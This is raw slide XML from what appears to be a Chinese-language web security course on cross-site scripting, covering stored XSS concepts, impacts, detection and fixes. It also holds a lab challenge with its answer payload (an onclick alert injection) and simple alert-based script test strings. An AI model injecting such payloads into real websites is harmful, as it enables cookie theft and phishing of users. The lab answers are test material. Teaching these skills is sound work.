            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;a=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>(72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100, 33);</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>(a);&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="cs-CZ" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62887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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>7:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>input hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>弹出“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>！”</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mcir.pte.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xssmh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/challenges/challenge7.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> "  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>accesskey</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="X" </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="alert('Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>!')”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>触发：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165583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存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过本知识域，我们会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的概念</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解什么是存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞对安全的影响</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的特征和检测方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的危害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的安全防护</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握修复存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解常用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞扫描工具对存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞扫描方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="915979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什么是存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，持久化，代码是存储在服务器中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是当不可信的用户输入被处理并在没有任何验证的情况下保存在文件或数据库，同时该不可信的数据从存储中被获取然后在没有编码或转义的情况下反射回响应文中，导致了永久性的每次存储数据反射回响应文代码就会在浏览器中执行的一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的影响有：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，根据这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取用户信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重定向网站到一个钓鱼网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重新更改页面内容，假装让客户输入用户名，密码，然后提交到黑客的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>生成蠕虫，迅速扩散到整个网站用户（微博等）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参考：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>www.freebuf.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/articles/web/19408.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1719990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如何检测存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者向被攻击页面写入恶意代码的方法很多，最常见的就是在论坛或留言本中发帖时将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码写入到被攻击页面中，此外在用户资料修改、签名、联系方式等地方也是攻击者写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码常用的地方，如果被攻击页面对用户输入过滤不严的话，就可以被攻击者写入类似如下的一段代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者输入恶意数据保存在数据库，再由服务器脚本程序从数据库中读取数据。所以大部分的存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞都是在表单提交上会发生的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>针对这种特性，我们需要做的就是在程序任何有可能提交表单上进行验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9874793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如何检测存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传统测试方式：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>任意可以输入的地方，使用上面代码尝试是否可以有如下的弹窗：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这个是最简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>检测方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565650" y="2520950"/>
            <a:ext cx="3060700" cy="1816100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18526877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rgbClr val="C00000"/>
            </a:gs>
            <a:gs pos="80000">
              <a:srgbClr val="70201E"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:shade val="94000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
        </a:gradFill>
      </a:spPr>
      <a:bodyPr rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
